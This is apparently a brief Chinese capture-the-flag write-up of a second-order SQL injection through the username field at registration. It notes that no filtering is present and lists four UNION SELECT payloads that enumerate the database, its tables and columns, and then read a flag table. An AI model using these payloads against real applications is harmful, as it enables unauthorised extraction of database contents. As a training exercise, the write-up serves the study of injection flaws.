标题朴实无华的二次注入
两个注入点,注册和改info
rua' union select database() #
在注册的user处可以找到二次注入点
没有特殊的过滤,四步正常走就行
rua' union select database() #
rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
rua' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
rua' union select flag from flag #